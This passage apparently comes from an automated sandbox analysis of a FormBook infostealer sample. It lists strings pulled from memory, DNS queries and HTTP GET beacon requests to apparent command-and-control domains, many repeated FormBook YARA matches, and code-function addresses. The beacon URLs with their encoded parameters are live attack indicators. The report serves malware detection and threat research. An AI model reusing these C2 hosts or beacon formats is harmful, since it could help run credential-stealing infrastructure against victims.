          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.253704425.0000000006043000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com3
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.253864499.0000000006043000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com9
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.250514753.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kra-e#
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252797134.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252833728.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comw
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.259240750.0000000006047000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.256166829.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.256226500.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deA
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cncom
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnk
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.E
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.U
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnue
          Source: cmd.exe, 00000017.00000002.521651760.0000000003C32000.00000004.00020000.sdmpString found in binary or memory: https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLV
          Source: unknownDNS traffic detected: queries for: www.ice-lemon.pro
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.indianadogeavaxsite.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.munortiete.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.280628910.0000000001448000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA20681_2_04FA2068
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA41901_2_04FA4190
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA28D01_2_04FA28D0
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA28CE1_2_04FA28CE
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA20591_2_04FA2059
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA25101_2_04FA2510
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA6D081_2_04FA6D08
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA25011_2_04FA2501
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA2ACF1_2_04FA2ACF
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA03881_2_04FA0388
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA037A1_2_04FA037A
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA2B0F1_2_04FA2B0F
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_054CE5CA1_2_054CE5CA
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_054CE5D81_2_054CE5D8
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_054CBC341_2_054CBC34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004010276_2_00401027
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041C94A6_2_0041C94A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041BB996_2_0041BB99
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00408C606_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A6AA6_2_0041A6AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7B0906_2_00F7B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_010210026_2_01021002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F841206_2_00F84120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6F9006_2_00F6F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9EBB06_2_00F9EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01031D556_2_01031D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F60D206_2_00F60D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F86E306_2_00F86E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008748E623_2_008748E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00895CEA23_2_00895CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00879CF023_2_00879CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087D80323_2_0087D803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087E04023_2_0087E040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087719023_2_00877190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008931DC23_2_008931DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0089350623_2_00893506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0088655023_2_00886550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0088196923_2_00881969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00878AD723_2_00878AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087522623_2_00875226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087FA3023_2_0087FA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00875E7023_2_00875E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00885FC823_2_00885FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00896FF023_2_00896FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087CB4823_2_0087CB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DEBB023_2_035DEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C6E3023_2_035C6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03671D5523_2_03671D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AF90023_2_035AF900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A0D2023_2_035A0D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C412023_2_035C4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BD5E023_2_035BD5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B841F23_2_035B841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0366100223_2_03661002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BB09023_2_035BB090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 035AB150 appears 32 times